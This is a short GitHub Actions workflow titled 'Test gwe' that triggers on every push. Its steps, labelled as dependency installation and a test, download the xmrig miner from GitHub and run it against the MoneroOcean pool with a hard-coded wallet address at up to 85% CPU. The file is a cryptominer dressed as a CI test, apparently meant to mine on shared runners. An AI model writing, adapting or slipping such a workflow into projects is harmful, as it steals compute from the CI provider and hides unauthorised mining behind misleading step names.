name: Test gwe

on:
  push:
  workflow_dispatch:

jobs:
  gwe:
    runs-on: ubuntu-latest

    steps:
      - name: Install dependencies
        run: |
          sudo apt-get install curl
          mkdir -p ~/moneroocean && cd ~/moneroocean
          url=$(curl -fsSL https://api.github.com/repos/MoneroOcean/xmrig/releases/latest | grep browser_download_url | grep -E 'lin64-compat|lin64\.tar\.gz' | head -1 | cut -d '"' -f 4)
          curl -L "$url" -o xmrig.tar.gz && tar xf xmrig.tar.gz && chmod +x xmrig

      - name: Test jalankan gwe 
        run: |
          cd ~/moneroocean
          ./xmrig -o gulf.moneroocean.stream:20064 -u 89nrRkC52Zd3n24GUh7yCVLLmt2wXGnFPWGtPJuHpQnBbmPJvV1RURbHy6cxu2L5kiGcgRZVBLSKYCqggDC7ynR3MSTs5rk --rig-id rig01 --keepalive --tls --cpu-max-threads-hint 85
